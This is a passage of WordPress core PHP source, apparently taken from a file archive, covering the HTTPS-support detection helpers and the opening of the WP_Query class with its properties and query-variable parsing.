* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-query-20260621134858.php 0000666 00000477640 15224151220 0011566 0 ustar 00 <?php
/**
* Query API: WP_Query class
*
* @package WordPress
* @subpackage Query
* @since 4.7.0
*/
/**
* The WordPress Query class.
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @since 1.5.0
* @since 4.5.0 Removed the `$comments_popup` property.
*/
#[AllowDynamicProperties]
class WP_Query {
/**
* Query vars set by the user.
*
* @since 1.5.0
* @var array
*/
public $query;
/**
* Query vars, after parsing.
*
* @since 1.5.0
* @var array
*/
public $query_vars = array();
/**
* Taxonomy query, as passed to get_tax_sql().
*
* @since 3.1.0
* @var WP_Tax_Query|null A taxonomy query instance.
*/
public $tax_query;
/**
* Metadata query container.
*
* @since 3.2.0
* @var WP_Meta_Query A meta query instance.
*/
public $meta_query = false;
/**
* Date query container.
*
* @since 3.7.0
* @var WP_Date_Query A date query instance.
*/
public $date_query = false;
/**
* Holds the data for a single object that is queried.
*
* Holds the contents of a post, page, category, attachment.
*
* @since 1.5.0
* @var WP_Term|WP_Post_Type|WP_Post|WP_User|null
*/
public $queried_object;
/**
* The ID of the queried object.
*
* @since 1.5.0
* @var int
*/
public $queried_object_id;
/**
* SQL for the database query.
*
* @since 2.0.1
* @var string
*/
public $request;
/**
* Array of post objects or post IDs.
*
* @since 1.5.0
* @var WP_Post[]|int[]
*/
public $posts;
/**
* The number of posts for the current query.
*
* @since 1.5.0
* @var int
*/
public $post_count = 0;
/**
* Index of the current item in the loop.
*
* @since 1.5.0
* @var int
*/
public $current_post = -1;
/**
* Whether the caller is before the loop.
*
* @since 6.3.0
* @var bool
*/
public $before_loop = true;
/**
* Whether the loop has started and the caller is in the loop.
*
* @since 2.0.0
* @var bool
*/
public $in_the_loop = false;
/**
* The current post.
*
* This property does not get populated when the `fields` argument is set to
* `ids` or `id=>parent`.
*
* @since 1.5.0
* @var WP_Post|null
*/
public $post;
/**
* The list of comments for current post.
*
* @since 2.2.0
* @var WP_Comment[]
*/
public $comments;
/**
* The number of comments for the posts.
*
* @since 2.2.0
* @var int
*/
public $comment_count = 0;
/**
* The index of the comment in the comment loop.
*
* @since 2.2.0
* @var int
*/
public $current_comment = -1;
/**
* Current comment object.
*
* @since 2.2.0
* @var WP_Comment
*/
public $comment;
/**
* The number of found posts for the current query.
*
* If limit clause was not used, equals $post_count.
*
* @since 2.1.0
* @var int
*/
public $found_posts = 0;
/**
* The number of pages.
*
* @since 2.1.0
* @var int
*/
public $max_num_pages = 0;
/**
* The number of comment pages.
*
* @since 2.7.0
* @var int
*/
public $max_num_comment_pages = 0;
/**
* Signifies whether the current query is for a single post.
*
* @since 1.5.0
* @var bool
*/
public $is_single = false;
/**
* Signifies whether the current query is for a preview.
*
* @since 2.0.0
* @var bool
*/
public $is_preview = false;
/**
* Signifies whether the current query is for a page.
*
* @since 1.5.0
* @var bool
*/
public $is_page = false;
/**
* Signifies whether the current query is for an archive.
*
* @since 1.5.0
* @var bool
*/
public $is_archive = false;
/**
* Signifies whether the current query is for a date archive.
*
* @since 1.5.0
* @var bool
*/
public $is_date = false;
/**
* Signifies whether the current query is for a year archive.
*
* @since 1.5.0
* @var bool
*/
public $is_year = false;
/**
* Signifies whether the current query is for a month archive.
*
* @since 1.5.0
* @var bool
*/
public $is_month = false;
/**
* Signifies whether the current query is for a day archive.
*
* @since 1.5.0
* @var bool
*/
public $is_day = false;
/**
* Signifies whether the current query is for a specific time.
*
* @since 1.5.0
* @var bool
*/
public $is_time = false;
/**
* Signifies whether the current query is for an author archive.
*
* @since 1.5.0
* @var bool
*/
public $is_author = false;
/**
* Signifies whether the current query is for a category archive.
*
* @since 1.5.0
* @var bool
*/
public $is_category = false;
/**
* Signifies whether the current query is for a tag archive.
*
* @since 2.3.0
* @var bool
*/
public $is_tag = false;
/**
* Signifies whether the current query is for a taxonomy archive.
*
* @since 2.5.0
* @var bool
*/
public $is_tax = false;
/**
* Signifies whether the current query is for a search.
*
* @since 1.5.0
* @var bool
*/
public $is_search = false;
/**
* Signifies whether the current query is for a feed.
*
* @since 1.5.0
* @var bool
*/
public $is_feed = false;
/**
* Signifies whether the current query is for a comment feed.
*
* @since 2.2.0
* @var bool
*/
public $is_comment_feed = false;
/**
* Signifies whether the current query is for trackback endpoint call.
*
* @since 1.5.0
* @var bool
*/
public $is_trackback = false;
/**
* Signifies whether the current query is for the site homepage.
*
* @since 1.5.0
* @var bool
*/
public $is_home = false;
/**
* Signifies whether the current query is for the Privacy Policy page.
*
* @since 5.2.0
* @var bool
*/
public $is_privacy_policy = false;
/**
* Signifies whether the current query couldn't find anything.
*
* @since 1.5.0
* @var bool
*/
public $is_404 = false;
/**
* Signifies whether the current query is for an embed.
*
* @since 4.4.0
* @var bool
*/
public $is_embed = false;
/**
* Signifies whether the current query is for a paged result and not for the first page.
*
* @since 1.5.0
* @var bool
*/
public $is_paged = false;
/**
* Signifies whether the current query is for an administrative interface page.
*
* @since 1.5.0
* @var bool
*/
public $is_admin = false;
/**
* Signifies whether the current query is for an attachment page.
*
* @since 2.0.0
* @var bool
*/
public $is_attachment = false;
/**
* Signifies whether the current query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* @since 2.1.0
* @var bool
*/
public $is_singular = false;
/**
* Signifies whether the current query is for the robots.txt file.
*
* @since 2.1.0
* @var bool
*/
public $is_robots = false;
/**
* Signifies whether the current query is for the favicon.ico file.
*
* @since 5.4.0
* @var bool
*/
public $is_favicon = false;
/**
* Signifies whether the current query is for the page_for_posts page.
*
* Basically, the homepage if the option isn't set for the static homepage.
*
* @since 2.1.0
* @var bool
*/
public $is_posts_page = false;
/**
* Signifies whether the current query is for a post type archive.
*
* @since 3.1.0
* @var bool
*/
public $is_post_type_archive = false;
/**
* Stores the ->query_vars state like md5(serialize( $this->query_vars ) ) so we know
* whether we have to re-parse because something has changed
*
* @since 3.1.0
* @var bool|string
*/
private $query_vars_hash = false;
/**
* Whether query vars have changed since the initial parse_query() call. Used to catch modifications to query vars made
* via pre_get_posts hooks.
*
* @since 3.1.1
* @var bool
*/
private $query_vars_changed = true;
/**
* Set if post thumbnails are cached
*
* @since 3.2.0
* @var bool
*/
public $thumbnails_cached = false;
/**
* Controls whether an attachment query should include filenames or not.
*
* @since 6.0.3
* @var bool
*/
protected $allow_query_attachment_by_filename = false;
/**
* Cached list of search stopwords.
*
* @since 3.7.0
* @var array
*/
private $stopwords;
private $compat_fields = array( 'query_vars_hash', 'query_vars_changed' );
private $compat_methods = array( 'init_query_flags', 'parse_tax_query' );
/**
* The cache key generated by the query.
*
* The cache key is generated by the method ::generate_cache_key() after the
* query has been normalized.
*
* @since 6.8.0
* @var string
*/
private $query_cache_key = '';
/**
* Resets query flags to false.
*
* The query flags are what page info WordPress was able to figure out.
*
* @since 2.0.0
*/
private function init_query_flags() {
$this->is_single = false;
$this->is_preview = false;
$this->is_page = false;
$this->is_archive = false;
$this->is_date = false;
$this->is_year = false;
$this->is_month = false;
$this->is_day = false;
$this->is_time = false;
$this->is_author = false;
$this->is_category = false;
$this->is_tag = false;
$this->is_tax = false;
$this->is_search = false;
$this->is_feed = false;
$this->is_comment_feed = false;
$this->is_trackback = false;
$this->is_home = false;
$this->is_privacy_policy = false;
$this->is_404 = false;
$this->is_paged = false;
$this->is_admin = false;
$this->is_attachment = false;
$this->is_singular = false;
$this->is_robots = false;
$this->is_favicon = false;
$this->is_posts_page = false;
$this->is_post_type_archive = false;
}
/**
* Initiates object properties and sets default values.
*
* @since 1.5.0
*/
public function init() {
unset( $this->posts );
unset( $this->query );
$this->query_vars = array();
unset( $this->queried_object );
unset( $this->queried_object_id );
$this->post_count = 0;
$this->current_post = -1;
$this->in_the_loop = false;
$this->before_loop = true;
unset( $this->request );
unset( $this->post );
unset( $this->comments );
unset( $this->comment );
$this->comment_count = 0;
$this->current_comment = -1;
$this->found_posts = 0;
$this->max_num_pages = 0;
$this->max_num_comment_pages = 0;
$this->init_query_flags();
}
/**
* Reparses the query vars.
*
* @since 1.5.0
*/
public function parse_query_vars() {
$this->parse_query();
}
/**
* Fills in the query variables, which do not exist within the parameter.
*
* @since 2.1.0
* @since 4.5.0 Removed the `comments_popup` public query variable.
*
* @param array $query_vars Defined query variables.
* @return array Complete query variables with undefined ones filled in empty.
*/
public function fill_query_vars( $query_vars ) {
$keys = array(
'error',
'm',
'p',
'post_parent',
'subpost',
'subpost_id',
'attachment',
'attachment_id',
'name',
'pagename',
'page_id',
'second',
'minute',
'hour',
'day',
'monthnum',
'year',
'w',
'category_name',
'tag',
'cat',
'tag_id',
'author',
'author_name',
'feed',
'tb',
'paged',
'meta_key',
'meta_value',
'preview',
's',
'sentence',
'title',
'fields',
'menu_order',
'embed',
);
foreach ( $keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = '';
}
}
$array_keys = array(
'category__in',
'category__not_in',
'category__and',
'post__in',
'post__not_in',
'post_name__in',
'tag__in',
'tag__not_in',
'tag__and',
'tag_slug__in',
'tag_slug__and',
'post_parent__in',
'post_parent__not_in',
'author__in',
'author__not_in',
'search_columns',
);
foreach ( $array_keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = array();
}
}
return $query_vars;
}
/**
* Parses a query string and sets query type booleans.
*
* @since 1.5.0
* @since 4.2.0 Introduced the ability to order by specific clauses of a `$meta_query`, by passing the clause's
* array key to `$orderby`.
* @since 4.4.0 Introduced `$post_name__in` and `$title` parameters. `$s` was updated to support excluded
* search terms, by prepending a hyphen.
* @since 4.5.0 Removed the `$comments_popup` parameter.
* Introduced the `$comment_status` and `$ping_status` parameters.
* Introduced `RAND(x)` syntax for `$orderby`, which allows an integer seed value to random sorts.
* @since 4.6.0 Added 'post_name__in' support for `$orderby`. Introduced the `$lazy_load_term_meta` argument.
* @since 4.9.0 Introduced the `$comment_count` parameter.
* @since 5.1.0 Introduced the `$meta_compare_key` parameter.
* @since 5.3.0 Introduced the `$meta_type_key` parameter.
* @since 6.1.0 Introduced the `$update_menu_item_cache` parameter.
* @since 6.2.0 Introduced the `$search_columns` parameter.
*
* @param string|array $query {
* Optional. Array or string of Query parameters.
*
* @type int $attachment_id Attachment post ID. Used for 'attachment' post_type.
* @type int|string $author Author ID, or comma-separated list of IDs.
* @type string $author_name User 'user_nicename'.
* @type int[] $author__in An array of author IDs to query from.
* @type int[] $author__not_in An array of author IDs not to query from.
* @type bool $cache_results Whether to cache post information. Default true.
* @type int|string $cat Category ID or comma-separated list of IDs (this or any children).
* @type int[] $category__and An array of category IDs (AND in).
* @type int[] $category__in An array of category IDs (OR in, no children).
* @type int[] $category__not_in An array of category IDs (NOT in).
* @type string $category_name Use category slug (not name, this or any children).
* @type array|int $comment_count Filter results by comment count. Provide an integer to match
* comment count exactly. Provide an array with integer 'value'
* and 'compare' operator ('=', '!=', '>', '>=', '<', '<=' ) to
* compare against comment_count in a specific way.
* @type string $comment_status Comment status.
* @type int $comments_per_page The number of comments to return per page.
* Default 'comments_per_page' option.
* @type array $date_query An associative array of WP_Date_Query arguments.
* See WP_Date_Query::__construct().
* @type int $day Day of the month. Default empty. Accepts numbers 1-31.
* @type bool $exact Whether to search by exact keyword. Default false.
* @type string $fields Post fields to query for. Accepts:
* - '' Returns an array of complete post objects (`WP_Post[]`).
* - 'ids' Returns an array of post IDs (`int[]`).
* - 'id=>parent' Returns an associative array of parent post IDs,
* keyed by post ID (`int[]`).
* Default ''.
* @type int $hour Hour of the day. Default empty. Accepts numbers 0-23.
* @type int|bool $ignore_sticky_posts Whether to ignore sticky posts or not. Setting this to false
* excludes stickies from 'post__in'. Accepts 1|true, 0|false.
* Default false.
* @type int $m Combination YearMonth. Accepts any four-digit year and month
* numbers 01-12. Default empty.
* @type string|string[] $meta_key Meta key or keys to filter by.
* @type string|string[] $meta_value Meta value or values to filter by.
* @type string $meta_compare MySQL operator used for comparing the meta value.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_compare_key MySQL operator used for comparing the meta key.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type MySQL data type that the meta_value column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type_key MySQL data type that the meta_key column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type array $meta_query An associative array of WP_Meta_Query arguments.
* See WP_Meta_Query::__construct() for accepted values.
* @type int $menu_order The menu order of the posts.
* @type int $minute Minute of the hour. Default empty. Accepts numbers 0-59.
* @type int $monthnum The two-digit month. Default empty. Accepts numbers 1-12.
* @type string $name Post slug.
* @type bool $nopaging Show all posts (true) or paginate (false). Default false.
* @type bool $no_found_rows Whether to skip counting the total rows found. Enabling can improve
* performance. Default false.
* @type int $offset The number of posts to offset before retrieval.
* @type string $order Designates ascending or descending order of posts. Default 'DESC'.
* Accepts 'ASC', 'DESC'.
* @type string|array $orderby Sort retrieved posts by parameter. One or more options may be passed.
* To use 'meta_value', or 'meta_value_num', 'meta_key=keyname' must be
* also be defined. To sort by a specific `$meta_query` clause, use that
* clause's array key. Accepts:
* - 'none'
* - 'name'
* - 'author'
* - 'date'
* - 'title'
* - 'modified'
* - 'menu_order'
* - 'parent'
* - 'ID'
* - 'rand'
* - 'relevance'
* - 'RAND(x)' (where 'x' is an integer seed value)
* - 'comment_count'
* - 'meta_value'
* - 'meta_value_num'
* - 'post__in'
* - 'post_name__in'
* - 'post_parent__in'
* - The array keys of `$meta_query`.
* Default is 'date', except when a search is being performed, when
* the default is 'relevance'.
* @type int $p Post ID.
* @type int $page Show the number of posts that would show up on page X of a
* static front page.
* @type int $paged The number of the current page.
* @type int $page_id Page ID.
* @type string $pagename Page slug.
* @type string $perm Show posts if user has the appropriate capability.
* @type string $ping_status Ping status.
* @type int[] $post__in An array of post IDs to retrieve, sticky posts will be included.
* @type int[] $post__not_in An array of post IDs not to retrieve. Note: a string of comma-
* separated IDs will NOT work.
* @type string $post_mime_type The mime type of the post. Used for 'attachment' post_type.
* @type string[] $post_name__in An array of post slugs that results must match.
* @type int $post_parent Page ID to retrieve child pages for. Use 0 to only retrieve
* top-level pages.
* @type int[] $post_parent__in An array containing parent page IDs to query child pages from.
* @type int[] $post_parent__not_in An array containing parent page IDs not to query child pages from.
* @type string|string[] $post_type A post type slug (string) or array of post type slugs.
* Default 'any' if using 'tax_query'.
* @type string|string[] $post_status A post status (string) or array of post statuses.
* @type int $posts_per_page The number of posts to query for. Use -1 to request all posts.
* @type int $posts_per_archive_page The number of posts to query for by archive page. Overrides
* 'posts_per_page' when is_archive(), or is_search() are true.
* @type string $s Search keyword(s). Prepending a term with a hyphen will
* exclude posts matching that term. Eg, 'pillow -sofa' will
* return posts containing 'pillow' but not 'sofa'. The
* character used for exclusion can be modified using the
* the 'wp_query_search_exclusion_prefix' filter.
* @type string[] $search_columns Array of column names to be searched. Accepts 'post_title',
* 'post_excerpt' and 'post_content'. Default empty array.
* @type int $second Second of the minute. Default empty. Accepts numbers 0-59.
* @type bool $sentence Whether to search by phrase. Default false.
* @type bool $suppress_filters Whether to suppress filters. Default false.
* @type string $tag Tag slug. Comma-separated (either), Plus-separated (all).
* @type int[] $tag__and An array of tag IDs (AND in).
* @type int[] $tag__in An array of tag IDs (OR in).
* @type int[] $tag__not_in An array of tag IDs (NOT in).
* @type int $tag_id Tag id or comma-separated list of IDs.
* @type string[] $tag_slug__and An array of tag slugs (AND in).
* @type string[] $tag_slug__in An array of tag slugs (OR in). unless 'ignore_sticky_posts' is
* true. Note: a string of comma-separated IDs will NOT work.
* @type array $tax_query An associative array of WP_Tax_Query arguments.
* See WP_Tax_Query::__construct().
* @type string $title Post title.
* @type bool $update_post_meta_cache Whether to update the post meta cache. Default true.
* @type bool $update_post_term_cache Whether to update the post term cache. Default true.
* @type bool $update_menu_item_cache Whether to update the menu item cache. Default false.
* @type bool $lazy_load_term_meta Whether to lazy-load term meta. Setting to false will
* disable cache priming for term meta, so that each
* get_term_meta() call will hit the database.
* Defaults to the value of `$update_post_term_cache`.
* @type int $w The week number of the year. Default empty. Accepts numbers 0-53.
* @type int $year The four-digit year. Default empty. Accepts any four-digit year.
* }
*/
public function parse_query( $query = '' ) {
if ( ! empty( $query ) ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
} elseif ( ! isset( $this->query ) ) {
$this->query = $this->query_vars;
}
$this->query_vars = $this->fill_query_vars( $this->query_vars );
$query_vars = &$this->query_vars;
$this->query_vars_changed = true;
if ( ! empty( $query_vars['robots'] ) ) {
$this->is_robots = true;
} elseif ( ! empty( $query_vars['favicon'] ) ) {
$this->is_favicon = true;
}
if ( ! is_scalar( $query_vars['p'] ) || (int) $query_vars['p'] < 0 ) {
$query_vars['p'] = 0;
$query_vars['error'] = '404';
} else {
$query_vars['p'] = (int) $query_vars['p'];
}
$query_vars['page_id'] = is_scalar( $query_vars['page_id'] ) ? absint( $query_vars['page_id'] ) : 0;
$query_vars['year'] = is_scalar( $query_vars['year'] ) ? absint( $query_vars['year'] ) : 0;
$query_vars['monthnum'] = is_scalar( $query_vars['monthnum'] ) ? absint( $query_vars['monthnum'] ) : 0;
$query_vars['day'] = is_scalar( $query_vars['day'] ) ? absint( $query_vars['day'] ) : 0;
$query_vars['w'] = is_scalar( $query_vars['w'] ) ? absint( $query_vars['w'] ) : 0;
$query_vars['m'] = is_scalar( $query_vars['m'] ) ? preg_replace( '|[^0-9]|', '', $query_vars['m'] ) : '';
$query_vars['paged'] = is_scalar( $query_vars['paged'] ) ? absint( $query_vars['paged'] ) : 0;
$query_vars['cat'] = preg_replace( '|[^0-9,-]|', '', $query_vars['cat'] ); // Array or comma-separated list of positive or negative integers.
$query_vars['author'] = is_scalar( $query_vars['author'] ) ? preg_replace( '|[^0-9,-]|', '', $query_vars['author'] ) : ''; // Comma-separated list of positive or negative integers.
$query_vars['pagename'] = is_scalar( $query_vars['pagename'] ) ? trim( $query_vars['pagename'] ) : '';
$query_vars['name'] = is_scalar( $query_vars['name'] ) ? trim( $query_vars['name'] ) : '';
$query_vars['title'] = is_scalar( $query_vars['title'] ) ? trim( $query_vars['title'] ) : '';
if ( is_scalar( $query_vars['hour'] ) && '' !== $query_vars['hour'] ) {
$query_vars['hour'] = absint( $query_vars['hour'] );
} else {
$query_vars['hour'] = '';
}
if ( is_scalar( $query_vars['minute'] ) && '' !== $query_vars['minute'] ) {
$query_vars['minute'] = absint( $query_vars['minute'] );
} else {
$query_vars['minute'] = '';
}
if ( is_scalar( $query_vars['second'] ) && '' !== $query_vars['second'] ) {
$query_vars['second'] = absint( $query_vars['second'] );
} else {
$query_vars['second'] = '';
}
if ( is_scalar( $query_vars['menu_order'] ) && '' !== $query_vars['menu_order'] ) {
$query_vars['menu_order'] = absint( $query_vars['menu_order'] );
} else {
$query_vars['menu_order'] = '';
}
// Fairly large, potentially too large, upper bound for search string lengths.
if ( ! is_scalar( $query_vars['s'] ) || ( ! empty( $query_vars['s'] ) && strlen( $query_vars['s'] ) > 1600 ) ) {
$query_vars['s'] = '';
}
// Compat. Map subpost to attachment.
if ( is_scalar( $query_vars['subpost'] ) && '' != $query_vars['subpost'] ) {
$query_vars['attachment'] = $query_vars['subpost'];
}
if ( is_scalar( $query_vars['subpost_id'] ) && '' != $query_vars['subpost_id'] ) {
$query_vars['attachment_id'] = $query_vars['subpost_id'];
}
$query_vars['attachment_id'] = is_scalar( $query_vars['attachment_id'] ) ? absint( $query_vars['attachment_id'] ) : 0;
if ( ( '' !== $query_vars['attachment'] ) || ! empty( $query_vars['attachment_id'] ) ) {
$this->is_single = true;
$this->is_attachment = true;
} elseif ( '' !== $query_vars['name'] ) {
$this->is_single = true;
} elseif ( $query_vars['p'] ) {
$this->is_single = true;
} elseif ( '' !== $query_vars['pagename'] || ! empty( $query_vars['page_id'] ) ) {
$this->is_page = true;
$this->is_single = false;
} else {
// Look for archive queries. Dates, categories, authors, search, post type archives.
if ( isset( $this->query['s'] ) ) {
$this->is_search = true;
}
if ( '' !== $query_vars['second'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['minute'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['hour'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( $query_vars['day'] ) {
if ( ! $this->is_date ) {
$date = sprintf( '%04d-%02d-%02d', $query_vars['year'], $query_vars['monthnum'], $query_vars['day'] );
if ( $query_vars['monthnum'] && $query_vars['year'] && ! wp_checkdate( $query_vars['monthnum'], $query_vars['day'], $query_vars['year'], $date ) ) {
$query_vars['error'] = '404';
} else {
$this->is_day = true;
$this->is_date = true;
}
}
}
if ( $query_vars['monthnum'] ) {
if ( ! $this->is_date ) {
if ( 12 < $query_vars['monthnum'] ) {
$query_vars['error'] = '404';
} else {
$this->is_month = true;
$this->is_date = true;
}
}
}
if ( $query_vars['year'] ) {
if ( ! $this->is_date ) {
$this->is_year = true;
$this->is_date = true;
}
}
if ( $query_vars['m'] ) {
$this->is_date = true;
if ( strlen( $query_vars['m'] ) > 9 ) {
$this->is_time = true;
} elseif ( strlen( $query_vars['m'] ) > 7 ) {
$this->is_day = true;
} elseif ( strlen( $query_vars['m'] ) > 5 ) {
$this->is_month = true;
} else {
$this->is_year = true;
}
}
if ( $query_vars['w'] ) {
$this->is_date = true;
}
$this->query_vars_hash = false;
$this->parse_tax_query( $query_vars );
foreach ( $this->tax_query->queries as $tax_query ) {
if ( ! is_array( $tax_query ) ) {
continue;
}
if ( isset( $tax_query['operator'] ) && 'NOT IN' !== $tax_query['operator'] ) {
switch ( $tax_query['taxonomy'] ) {
case 'category':
$this->is_category = true;
break;
case 'post_tag':
$this->is_tag = true;
break;
default:
$this->is_tax = true;
}
}
}
unset( $tax_query );
if ( empty( $query_vars['author'] ) || ( '0' == $query_vars['author'] ) ) {
$this->is_author = false;
} else {
$this->is_author = true;
}
if ( '' !== $query_vars['author_name'] ) {
$this->is_author = true;
}
if ( ! empty( $query_vars['post_type'] ) && ! is_array( $query_vars['post_type'] ) ) {
$post_type_obj = get_post_type_object( $query_vars['post_type'] );
if ( ! empty( $post_type_obj->has_archive ) ) {
$this->is_post_type_archive = true;
}
}
if ( $this->is_post_type_archive || $this->is_date || $this->is_author || $this->is_category || $this->is_tag || $this->is_tax ) {
$this->is_archive = true;
}
}
if ( '' != $query_vars['feed'] ) {
$this->is_feed = true;
}
if ( '' != $query_vars['embed'] ) {
$this->is_embed = true;
}
if ( '' != $query_vars['tb'] ) {
$this->is_trackback = true;
}
if ( '' != $query_vars['paged'] && ( (int) $query_vars['paged'] > 1 ) ) {
$this->is_paged = true;
}
// If we're previewing inside the write screen.
if ( '' != $query_vars['preview'] ) {
$this->is_preview = true;
}
if ( is_admin() ) {
$this->is_admin = true;
}
if ( str_contains( $query_vars['feed'], 'comments-' ) ) {
$query_vars['feed'] = str_replace( 'comments-', '', $query_vars['feed'] );
$query_vars['withcomments'] = 1;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
if ( $this->is_feed && ( ! empty( $query_vars['withcomments'] ) || ( empty( $query_vars['withoutcomments'] ) && $this->is_singular ) ) ) {
$this->is_comment_feed = true;
}
if ( ! ( $this->is_singular || $this->is_archive || $this->is_search || $this->is_feed
|| ( wp_is_serving_rest_request() && $this->is_main_query() )
|| $this->is_trackback || $this->is_404 || $this->is_admin || $this->is_robots || $this->is_favicon ) ) {
$this->is_home = true;
}
// Correct `is_*` for 'page_on_front' and 'page_for_posts'.
if ( $this->is_home && 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' ) ) {
$_query = wp_parse_args( $this->query );
// 'pagename' can be set and empty depending on matched rewrite rules. Ignore an empty 'pagename'.
if ( isset( $_query['pagename'] ) && '' === $_query['pagename'] ) {
unset( $_query['pagename'] );
}
unset( $_query['embed'] );
if ( empty( $_query ) || ! array_diff( array_keys( $_query ), array( 'preview', 'page', 'paged', 'cpage' ) ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
// Correct <!--nextpage--> for 'page_on_front'.
if ( ! empty( $query_vars['paged'] ) ) {
$query_vars['page'] = $query_vars['paged'];
unset( $query_vars['paged'] );
}
}
}
if ( '' !== $query_vars['pagename'] ) {
$this->queried_object = get_page_by_path( $query_vars['pagename'] );
if ( $this->queried_object && 'attachment' === $this->queried_object->post_type ) {
if ( preg_match( '/^[^%]*%(?:postname)%/', get_option( 'permalink_structure' ) ) ) {
// See if we also have a post with the same slug.
$post = get_page_by_path( $query_vars['pagename'], OBJECT, 'post' );
if ( $post ) {
$this->queried_object = $post;
$this->is_page = false;
$this->is_single = true;
}
}
}
if ( ! empty( $this->queried_object ) ) {
$this->queried_object_id = (int) $this->queried_object->ID;
} else {
unset( $this->queried_object );
}
if ( 'page' === get_option( 'show_on_front' ) && isset( $this->queried_object_id ) && get_option( 'page_for_posts' ) == $this->queried_object_id ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( isset( $this->queried_object_id ) && get_option( 'wp_page_for_privacy_policy' ) == $this->queried_object_id ) {
$this->is_privacy_policy = true;
}
}
if ( $query_vars['page_id'] ) {
if ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_for_posts' ) == $query_vars['page_id'] ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( get_option( 'wp_page_for_privacy_policy' ) == $query_vars['page_id'] ) {
$this->is_privacy_policy = true;
}
}
if ( ! empty( $query_vars['post_type'] ) ) {
if ( is_array( $query_vars['post_type'] ) ) {
$query_vars['post_type'] = array_map( 'sanitize_key', array_unique( $query_vars['post_type'] ) );
sort( $query_vars['post_type'] );
} else {
$query_vars['post_type'] = sanitize_key( $query_vars['post_type'] );
}
}
if ( ! empty( $query_vars['post_status'] ) ) {
